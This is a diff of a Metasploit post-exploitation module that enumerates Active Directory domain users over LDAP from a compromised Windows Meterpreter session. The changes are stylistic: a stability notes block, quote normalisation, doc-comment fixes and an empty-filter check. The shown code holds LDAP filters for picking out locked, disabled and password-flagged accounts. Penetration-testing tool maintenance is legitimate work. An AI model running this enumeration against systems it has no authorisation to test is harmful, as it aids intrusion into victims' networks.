@@ -40,6 +40,11 @@ class MetasploitModule < Msf::Post
         ],
         'Platform' => [ 'win' ],
         'SessionTypes' => [ 'meterpreter' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        },
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
@@ -75,7 +80,7 @@ class MetasploitModule < Msf::Post
     @user_fields = USER_FIELDS.dup
 
     if datastore['ADDITIONAL_FIELDS']
-      additional_fields = datastore['ADDITIONAL_FIELDS'].gsub(/\s+/, "").split(',')
+      additional_fields = datastore['ADDITIONAL_FIELDS'].gsub(/\s+/, '').split(',')
       @user_fields.push(*additional_fields)
     end
 
@@ -114,14 +119,14 @@ class MetasploitModule < Msf::Post
   # and records and usernames as {Metasploit::Credential::Core}s in
   # the database.
   #
-  # @param [Array<Array<Hash>>] the LDAP query results to parse
+  # @param results [Array<Array<Hash>>] The LDAP query results to parse
   # @return [Rex::Text::Table] the table containing all the result data
   def parse_results(results)
     domain = datastore['DOMAIN'] || get_domain
     domain_ip = client.net.resolve.resolve_host(domain)[:ip]
     # Results table holds raw string data
     results_table = Rex::Text::Table.new(
-      'Header' => "Domain Users",
+      'Header' => 'Domain Users',
       'Indent' => 1,
       'SortIndex' => -1,
       'Columns' => @user_fields
@@ -132,7 +137,7 @@ class MetasploitModule < Msf::Post
 
       result.each do |field|
         if field.nil?
-          row << ""
+          row << ''
         else
           row << field[:value]
         end
@@ -157,9 +162,10 @@ class MetasploitModule < Msf::Post
     inner_filter << '(!(lockoutTime>=1))' if datastore['EXCLUDE_LOCKED']
     inner_filter << '(!(userAccountControl:1.2.840.113556.1.4.803:=2))' if datastore['EXCLUDE_DISABLED']
     inner_filter << "(memberof:1.2.840.113556.1.4.1941:=#{datastore['GROUP_MEMBER']})" if datastore['GROUP_MEMBER']
-    inner_filter << "(#{datastore['FILTER']})" if datastore['FILTER'] != ""
+    inner_filter << "(#{datastore['FILTER']})" unless datastore['FILTER'].blank?
     case datastore['UAC']
     when 'ANY'
+      # no filter
     when 'NO_PASSWORD'
       inner_filter << '(userAccountControl:1.2.840.113556.1.4.803:=32)'
     when 'CHANGE_PASSWORD'
